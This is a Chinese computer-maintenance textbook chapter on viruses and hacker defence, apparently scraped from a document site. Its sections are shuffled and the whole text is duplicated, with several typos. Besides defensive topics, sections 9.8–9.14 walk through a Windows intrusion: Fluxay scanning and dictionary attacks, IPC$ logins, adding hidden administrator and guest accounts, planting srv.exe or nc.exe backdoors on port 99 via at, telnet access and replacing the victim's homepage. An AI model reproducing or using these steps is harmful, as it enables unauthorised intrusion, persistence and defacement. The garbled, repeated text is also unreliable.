第9章、计算机病毒与黑客防范
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
②使用字典:在主画面中选择pop3主机----右击---编 辑---从列表中添加---一个字典文件。 ③探测-----选择pop3主机,右击----探测用户信息
9.9、网络入侵实例解析
利用IPC进行探测:IPC$是共享“命名管道”的资源,它对 于程序间的通信很重要,在远程管理计算机和查看计算机的 共享资源时使用。利用IPC$可以与目标主机建立一个空的连 接(无需用户名和密码),而利用这个空连接就可以得到目 标主机上的用户列表,并配合字典进行密码尝试。
9.2 计算机病毒
4、病毒程序模型:包括三个部分,即安装模块、感染模块和 破坏模块。 5、计算机病毒的规律和现象。 ①内存少了1KB。一般病毒程序在内存中占用高端1K的空 间。该空间DOS操作系统管不了,病毒修改内存空间大 小标记单位[0413]单元中的内容,造成DOS操作系统就 认为机器是少1KB内存空间大小。 ②引导扇区被抢占。硬盘包括主引导扇区和DOS引导扇区 软盘只有DOS引导扇区。 ③文件被加长,文件性病毒寄生在可执行文件上,如 COM或EXE文件。 ④启动程序被修改。
9.3 计算机病毒的防范
1、使用OFFICESCAN软件杀毒 2、使用江民杀毒王杀毒
3、使用瑞星杀毒软件清除病毒。
4、清除冲击波病毒实例。 冲击波病毒是在2003年8月席卷全球计算机网络的一种计算机病毒 当时几乎造成60%的计算机处于瘫痪。 该病毒的特点如下: ①病毒名称:Worm.Blaser 发作时间:随机
9.5、清除冲击波病毒实例
3、给系统打补丁,进入微软网站下载系统补丁 Windows2000下载地址: http://microsoft.com/downloads/details.aspx?familyI D=c8b8a846-f541-4c15-8c9f22354449117&displaylang=en 4、使用瑞星杀毒软件,须升级到15.48.01
计算机维护技术
第9章、计算机病毒与黑客防范
9.1 计算机病毒解析
1、计算机病毒的来源: 一方面计算机用处很大,另一方面计算机也存在很多可攻击的地方 即安全漏洞,所以出现了计算机病毒。
2、计算机病毒:指能够通过自身复制进行传染,进而起破坏作用的一种 计算机程序。
这类程序的主要特征如下: 程序性、传染性、欺骗性、危害性、隐蔽性、潜伏性、精巧性。 3、计算机病毒的分类: 引导性病毒、文件性病毒、网络型病毒
9.15 网络入侵的常用命令
Net star :显示网络连接、路由表和网络接口信息,可以 让用户得知目前有哪些网络连接正在运作。 在本机上使用netstar命令。 $ netstar
9.16 黑客防范技术
1、基本防范方法 将磁盘分区转换为NTFS格式。 远程访问(RAS)防范 访问单一服务器:限定所有远程用户访问单一服务器 使用其他协议:RAS服务器一般都使用TCP/IP协议,而 TCP/IP协议比较容易受攻击,改为IPX/SPX 和netbeui. 用户地址绑定,将用户名、密码、网卡和计算机名绑定。 及时更新安全漏洞补救程序。 2、防火墙技术 防火墙是一种用来加强网络之间访问控制的特殊网络 互联设备。放在内网和外网之间,根本任务是阻止外网用 户非法入侵,但不能阻止外网和内网之间的正常通信。
9.13 网络入侵的常用命令
Guest是NT默认用户,无法删除。可激活它并加上密码 激活guest用户: Net user guest /active:yes 增加密码: Net user guest 123456 一旦这样做后,就可以使用guest用户自由登录,并且 不被发现。 AT命令:此命令的功能是在特定的日期和时间运行某些 命令和程序. 种木马 假设已经登录了对方主机,键入如下命令: Net time \\127.0.0.1 这时系统返回一个时间,如12:1,同时得到新的作业ID=1,
9.12、网络入侵的常用命令
Net 命令 1、假设对方的IP地址是127.0.0.1,获取的用户名是abc, 密码是123456,利用IPC$连接、登录、退出。 IPC$是一种共享空连接。 连接并登录 Net use \\127.0.0.1\ipc$ “123456” /user: “abc” 退出 Net use \\127.0.0.1\ipc$ /delte 利用SA用户增加用户,用户名bcd,密码123456 一般SA用户相当系统的超级用户。创建用户: Net use bcd 123456 /add 加入administrator组: Net localgroup administrator bcd /add 设置guset默认用户。
9.源自文库7 黑客防范技术
1、通常使用的安全控制手段有 ①包过滤、 ②状态检测 ③代理服务。 代理服务是运行于内部网络和外部网络之间的主机
之上的一种应用。当用户需要访问代理服务器另一侧 的主机时,对符合安全规则的连接,代理服务器会代 替主机响应,并重新各主机发出一个相同的请求,当 此连接请求得到回应度建立起连接之后,内部主机同 外部主机之间的通信将通过代理程序映射相应边接实 现。
如何探测电子邮件:电子邮件系统一般建立在网络服
务器上,如电子邮件地址xxx@hotmail.com表示该电 子邮件存储在www.hotmail.com网站上,其域名为 Pop.hotmail.com 探测pop.hotmail.com
①打开软件-----选pop3主机,右击在弹出式菜单中选择 “编辑”,然后“添加”----pop.hotmail.com
1、VPN虚拟专用网组建 2、VPN示意图
9.21 网络安全体系结构
网络安全体系结构:从层次上讲包括网络级安全、应用级安全、系 统级安全和管理安全。 解决网络安全常用手段:
①防病毒软件
②防火墙 ③入侵检测
④虚拟网络(VLAN)指根据交换机端口(指静态虚拟局域网)或 MAC地址(动态虚拟局域网)将主机和相关客户机划分为一组,形成虚 拟局域网.。
例探测207.188.221.1---207.188.222.255 ①确定探测地址:选探测-----选择扫描pop3/ftp/nt/sql主机在 主机扫描范围输入207.188.221.1---207.188.222.255 类型选择“NT/98”
②选择IPC$主机----右击-----检测主机类型看结果。
9.18 黑客防范技术
2、防火墙产品:分为硬件防火墙和软件防火墙 华堂防火墙:一种智能过滤型软硬件一体化防御系统 网络卫士防火墙 瑞星软件防火墙:提供网络实时过滤监控功能,可防御各种木马 的恶意攻击(如BO、冰河)冲击波病毒主要是通过TCP的135、 4444端口和UDP的99端口进行攻击。
9.19 黑客防范技术
⑤虚拟专用网(VPN):是企业网在因特网上的延伸。通过一个专 有通道在公共网络上创建一个安全的专的连接。 ⑥加密技术:加密网络不依赖于网络传输途径,是通过对数据本身 的加密来保障网络安全性
9.22 网络安全体系结构
认证技术:解决网络通信过程中通信双方的身份认可。 常用认证方法 ①User/Password 认证:常用于操作系统登录\telnet ,此认证方式不加 密,容易被监听和解密。 ②使用摘要算法认证:Radius(拔号认证协议)\OSPf(路由协议) SNMP Security protocol等均使用共享的Security Key,加上摘要算法. ③基于PKI认证:使用公开密钥体系进行认证和加密,安全性很高。 应用在电子邮件、应用服务器访问、客户认证、防火墙认证,涉及到繁 重的证书管理任务。 ④数字签名:可验证发送者身份和消息完整性。消息随数字签名一同发 送,对消息的任何修改要验证数字签名时都被发现,伪造数字签名从计 算机能力上讲是不可行的。
9.14 网络入侵的常用命令
启动一个程序,键入at \\127.0.0.1 12:3 nc.exe 在12:3时间执行nc.exe程序,执行该程序,对方99端口就开 放,这就在对方机器上种下一个木马. telnet:远程登录命令,在正常情况下需要用户名和密 码,如果利用种下的木马,可以真接打开端口。如 telnet 127.0.0.1 99 FTP:是文件传输命令 例 设FTP服务器为www.abc.net 用户名为abc,密码为 123,用FTP命令实现文件双向传输。 登录: ftp www.abc.net 将本机c:\index.htm 文件传送到对方d:\下 Put c:\index.htm d:\ 将对方d:\index.htm 文件传送到本机c:\下 Get d:\index.htm c:\
9.6、黑客入侵解析
黑客概念:是计算机网络病毒程序,现指那些未经许可就闯入别人 计算机系统的人。
黑客入侵术: 1、密码破解术:通过网络监听用户密码、利用专门 软件破解、获得服务 上的shadow密码文件再破解。 2、特洛伊木马术,常用的木马软件有网络公牛(Netbull)、网络神偷( netthief)、WAY2.4(火凤凰\无赖小子)\广外女生\聪明基因,netspy(网络 精灵),木马往往躲藏在windows的系统目录下,伪装成一个文本文件和 网页文件,通过端口与外界联系。或者改变文件关联方式达到自启动。 从而泄漏信息。 3、监听术:拦截网络接口获取密码如sniffer软件。
②病毒类型:蠕虫病毒
传播途径:网络/RPC漏洞
病毒尺寸:6176字节
③依赖系统:Windows2000/XP
④发作现象:冲击疲病毒是利用微软公司在2003年7月21日公布的 RPC漏洞进行传播,有RPC服务且没有打安全补丁的计算机都有
9.4、清除冲击波病毒实例
漏洞,涉及WIN2000、XP、Server2003。计算机感染该病毒 后,系统资源被耗尽,有时会弹出RPC服务终止对话框、反 复得启动、不能收发邮件、不能正常复制和粘贴文件,无 法正常浏览网页,DNS和IIS服务遭到非法拒绝等。 冲击波病毒的清除 1、DOS环境下清除 用DOS系统盘启动,再进入Windows目录下查找msblast.exe 删除。 2、安全模式下清除 f 启动Windows进入安全模式,搜索C盘,查找msblast.exe文 件,删除。
3、瑞星防火墙设置举例: 下载瑞星防火墙软件演示:
4、网络入侵检测:是对防火墙的合理补充,帮助系统 对网络攻击,扩展了系统管理员的安全管理能力,从 网络中若干关键点收集信息,看网络中是否有违安全 策略的行为和遭到袭击的迹象。是典型的防黑客攻击 技术,代表产品有华依网络入侵检测系统。
9.20 VPN虚拟专用网
服务,操作步骤如下:
上传srv.exe程序,将流光目录tool文件下的srv.exe复制 到C盘,将srv.exe复制到对方服务器system32目录
Copy c:\srv.exe \\IP地址\admin$
9.11 网络入侵实例解析
获取进程,键入如下命令: Net time \\IP地址 得到时间,记住这个时间,在稍 后的 时间启动srv.exe ,键入 At \\ip地址 启动telnet的时间 srv.exe 这时用srv.exe 打开的默认端口是99,完成种木马。 再次登录,键入如下命令 telnet IP地址 99 就可再访问该服务器,直接到对方服务器的 c:\winnt\system32\目录下,这是黑客入侵的全过程
扫描到开放的主机后,在Windows2k的cmd.exe下键入 Net use \\IP地址\IPC$ “密码“ /user: “用户名”
9.10、网络入侵实例解析
连接成功后,可以更换对方Web主页,键入如下: Copy c:\index.htm \\IP地址\C$\inetpub\wwwroot 其中C$\inetpub\wwwroot是对方主机主页目录。 留后门,如果想在以后登录该服务器,可以设置telnet
9.7、 黑客入侵解析
4、电子邮件技术:佯称自己是系统管理员,给用户发 送邮件要求用户更改密码或在正常的附件中加载木马程 序。 5、系统漏洞术:利用操作系统和应用程序的漏洞。 6、默认帐户术:如unix主机都有FTP和GUEST帐户。
9.8、网络入侵实例解析
1、从因特网上下载流光(Fluxay)V4.71 FOR WinNT/2000/XP。操作演示:
9.9、网络入侵实例解析
利用IPC进行探测:IPC$是共享“命名管道”的资源,它对 于程序间的通信很重要,在远程管理计算机和查看计算机的 共享资源时使用。利用IPC$可以与目标主机建立一个空的连 接(无需用户名和密码),而利用这个空连接就可以得到目 标主机上的用户列表,并配合字典进行密码尝试。
9.2 计算机病毒
4、病毒程序模型:包括三个部分,即安装模块、感染模块和 破坏模块。 5、计算机病毒的规律和现象。 ①内存少了1KB。一般病毒程序在内存中占用高端1K的空 间。该空间DOS操作系统管不了,病毒修改内存空间大 小标记单位[0413]单元中的内容,造成DOS操作系统就 认为机器是少1KB内存空间大小。 ②引导扇区被抢占。硬盘包括主引导扇区和DOS引导扇区 软盘只有DOS引导扇区。 ③文件被加长,文件性病毒寄生在可执行文件上,如 COM或EXE文件。 ④启动程序被修改。
9.3 计算机病毒的防范
1、使用OFFICESCAN软件杀毒 2、使用江民杀毒王杀毒
3、使用瑞星杀毒软件清除病毒。
4、清除冲击波病毒实例。 冲击波病毒是在2003年8月席卷全球计算机网络的一种计算机病毒 当时几乎造成60%的计算机处于瘫痪。 该病毒的特点如下: ①病毒名称:Worm.Blaser 发作时间:随机
9.5、清除冲击波病毒实例
3、给系统打补丁,进入微软网站下载系统补丁 Windows2000下载地址: http://microsoft.com/downloads/details.aspx?familyI D=c8b8a846-f541-4c15-8c9f22354449117&displaylang=en 4、使用瑞星杀毒软件,须升级到15.48.01
计算机维护技术
第9章、计算机病毒与黑客防范
9.1 计算机病毒解析
1、计算机病毒的来源: 一方面计算机用处很大,另一方面计算机也存在很多可攻击的地方 即安全漏洞,所以出现了计算机病毒。
2、计算机病毒:指能够通过自身复制进行传染,进而起破坏作用的一种 计算机程序。
这类程序的主要特征如下: 程序性、传染性、欺骗性、危害性、隐蔽性、潜伏性、精巧性。 3、计算机病毒的分类: 引导性病毒、文件性病毒、网络型病毒
9.15 网络入侵的常用命令
Net star :显示网络连接、路由表和网络接口信息,可以 让用户得知目前有哪些网络连接正在运作。 在本机上使用netstar命令。 $ netstar
9.16 黑客防范技术
1、基本防范方法 将磁盘分区转换为NTFS格式。 远程访问(RAS)防范 访问单一服务器:限定所有远程用户访问单一服务器 使用其他协议:RAS服务器一般都使用TCP/IP协议,而 TCP/IP协议比较容易受攻击,改为IPX/SPX 和netbeui. 用户地址绑定,将用户名、密码、网卡和计算机名绑定。 及时更新安全漏洞补救程序。 2、防火墙技术 防火墙是一种用来加强网络之间访问控制的特殊网络 互联设备。放在内网和外网之间,根本任务是阻止外网用 户非法入侵,但不能阻止外网和内网之间的正常通信。
9.13 网络入侵的常用命令
Guest是NT默认用户,无法删除。可激活它并加上密码 激活guest用户: Net user guest /active:yes 增加密码: Net user guest 123456 一旦这样做后,就可以使用guest用户自由登录,并且 不被发现。 AT命令:此命令的功能是在特定的日期和时间运行某些 命令和程序. 种木马 假设已经登录了对方主机,键入如下命令: Net time \\127.0.0.1 这时系统返回一个时间,如12:1,同时得到新的作业ID=1,
9.12、网络入侵的常用命令
Net 命令 1、假设对方的IP地址是127.0.0.1,获取的用户名是abc, 密码是123456,利用IPC$连接、登录、退出。 IPC$是一种共享空连接。 连接并登录 Net use \\127.0.0.1\ipc$ “123456” /user: “abc” 退出 Net use \\127.0.0.1\ipc$ /delte 利用SA用户增加用户,用户名bcd,密码123456 一般SA用户相当系统的超级用户。创建用户: Net use bcd 123456 /add 加入administrator组: Net localgroup administrator bcd /add 设置guset默认用户。
9.源自文库7 黑客防范技术
1、通常使用的安全控制手段有 ①包过滤、 ②状态检测 ③代理服务。 代理服务是运行于内部网络和外部网络之间的主机
之上的一种应用。当用户需要访问代理服务器另一侧 的主机时,对符合安全规则的连接,代理服务器会代 替主机响应,并重新各主机发出一个相同的请求,当 此连接请求得到回应度建立起连接之后,内部主机同 外部主机之间的通信将通过代理程序映射相应边接实 现。
如何探测电子邮件:电子邮件系统一般建立在网络服
务器上,如电子邮件地址xxx@hotmail.com表示该电 子邮件存储在www.hotmail.com网站上,其域名为 Pop.hotmail.com 探测pop.hotmail.com
①打开软件-----选pop3主机,右击在弹出式菜单中选择 “编辑”,然后“添加”----pop.hotmail.com
1、VPN虚拟专用网组建 2、VPN示意图
9.21 网络安全体系结构
网络安全体系结构:从层次上讲包括网络级安全、应用级安全、系 统级安全和管理安全。 解决网络安全常用手段:
①防病毒软件
②防火墙 ③入侵检测
④虚拟网络(VLAN)指根据交换机端口(指静态虚拟局域网)或 MAC地址(动态虚拟局域网)将主机和相关客户机划分为一组,形成虚 拟局域网.。
例探测207.188.221.1---207.188.222.255 ①确定探测地址:选探测-----选择扫描pop3/ftp/nt/sql主机在 主机扫描范围输入207.188.221.1---207.188.222.255 类型选择“NT/98”
②选择IPC$主机----右击-----检测主机类型看结果。
9.18 黑客防范技术
2、防火墙产品:分为硬件防火墙和软件防火墙 华堂防火墙:一种智能过滤型软硬件一体化防御系统 网络卫士防火墙 瑞星软件防火墙:提供网络实时过滤监控功能,可防御各种木马 的恶意攻击(如BO、冰河)冲击波病毒主要是通过TCP的135、 4444端口和UDP的99端口进行攻击。
9.19 黑客防范技术
⑤虚拟专用网(VPN):是企业网在因特网上的延伸。通过一个专 有通道在公共网络上创建一个安全的专的连接。 ⑥加密技术:加密网络不依赖于网络传输途径,是通过对数据本身 的加密来保障网络安全性
9.22 网络安全体系结构
认证技术:解决网络通信过程中通信双方的身份认可。 常用认证方法 ①User/Password 认证:常用于操作系统登录\telnet ,此认证方式不加 密,容易被监听和解密。 ②使用摘要算法认证:Radius(拔号认证协议)\OSPf(路由协议) SNMP Security protocol等均使用共享的Security Key,加上摘要算法. ③基于PKI认证:使用公开密钥体系进行认证和加密,安全性很高。 应用在电子邮件、应用服务器访问、客户认证、防火墙认证,涉及到繁 重的证书管理任务。 ④数字签名:可验证发送者身份和消息完整性。消息随数字签名一同发 送,对消息的任何修改要验证数字签名时都被发现,伪造数字签名从计 算机能力上讲是不可行的。
9.14 网络入侵的常用命令
启动一个程序,键入at \\127.0.0.1 12:3 nc.exe 在12:3时间执行nc.exe程序,执行该程序,对方99端口就开 放,这就在对方机器上种下一个木马. telnet:远程登录命令,在正常情况下需要用户名和密 码,如果利用种下的木马,可以真接打开端口。如 telnet 127.0.0.1 99 FTP:是文件传输命令 例 设FTP服务器为www.abc.net 用户名为abc,密码为 123,用FTP命令实现文件双向传输。 登录: ftp www.abc.net 将本机c:\index.htm 文件传送到对方d:\下 Put c:\index.htm d:\ 将对方d:\index.htm 文件传送到本机c:\下 Get d:\index.htm c:\
9.6、黑客入侵解析
黑客概念:是计算机网络病毒程序,现指那些未经许可就闯入别人 计算机系统的人。
黑客入侵术: 1、密码破解术:通过网络监听用户密码、利用专门 软件破解、获得服务 上的shadow密码文件再破解。 2、特洛伊木马术,常用的木马软件有网络公牛(Netbull)、网络神偷( netthief)、WAY2.4(火凤凰\无赖小子)\广外女生\聪明基因,netspy(网络 精灵),木马往往躲藏在windows的系统目录下,伪装成一个文本文件和 网页文件,通过端口与外界联系。或者改变文件关联方式达到自启动。 从而泄漏信息。 3、监听术:拦截网络接口获取密码如sniffer软件。
②病毒类型:蠕虫病毒
传播途径:网络/RPC漏洞
病毒尺寸:6176字节
③依赖系统:Windows2000/XP
④发作现象:冲击疲病毒是利用微软公司在2003年7月21日公布的 RPC漏洞进行传播,有RPC服务且没有打安全补丁的计算机都有
9.4、清除冲击波病毒实例
漏洞,涉及WIN2000、XP、Server2003。计算机感染该病毒 后,系统资源被耗尽,有时会弹出RPC服务终止对话框、反 复得启动、不能收发邮件、不能正常复制和粘贴文件,无 法正常浏览网页,DNS和IIS服务遭到非法拒绝等。 冲击波病毒的清除 1、DOS环境下清除 用DOS系统盘启动,再进入Windows目录下查找msblast.exe 删除。 2、安全模式下清除 f 启动Windows进入安全模式,搜索C盘,查找msblast.exe文 件,删除。
3、瑞星防火墙设置举例: 下载瑞星防火墙软件演示:
4、网络入侵检测:是对防火墙的合理补充,帮助系统 对网络攻击,扩展了系统管理员的安全管理能力,从 网络中若干关键点收集信息,看网络中是否有违安全 策略的行为和遭到袭击的迹象。是典型的防黑客攻击 技术,代表产品有华依网络入侵检测系统。
9.20 VPN虚拟专用网
服务,操作步骤如下:
上传srv.exe程序,将流光目录tool文件下的srv.exe复制 到C盘,将srv.exe复制到对方服务器system32目录
Copy c:\srv.exe \\IP地址\admin$
9.11 网络入侵实例解析
获取进程,键入如下命令: Net time \\IP地址 得到时间,记住这个时间,在稍 后的 时间启动srv.exe ,键入 At \\ip地址 启动telnet的时间 srv.exe 这时用srv.exe 打开的默认端口是99,完成种木马。 再次登录,键入如下命令 telnet IP地址 99 就可再访问该服务器,直接到对方服务器的 c:\winnt\system32\目录下,这是黑客入侵的全过程
扫描到开放的主机后,在Windows2k的cmd.exe下键入 Net use \\IP地址\IPC$ “密码“ /user: “用户名”
9.10、网络入侵实例解析
连接成功后,可以更换对方Web主页,键入如下: Copy c:\index.htm \\IP地址\C$\inetpub\wwwroot 其中C$\inetpub\wwwroot是对方主机主页目录。 留后门,如果想在以后登录该服务器,可以设置telnet
9.7、 黑客入侵解析
4、电子邮件技术:佯称自己是系统管理员,给用户发 送邮件要求用户更改密码或在正常的附件中加载木马程 序。 5、系统漏洞术:利用操作系统和应用程序的漏洞。 6、默认帐户术:如unix主机都有FTP和GUEST帐户。
9.8、网络入侵实例解析
1、从因特网上下载流光(Fluxay)V4.71 FOR WinNT/2000/XP。操作演示: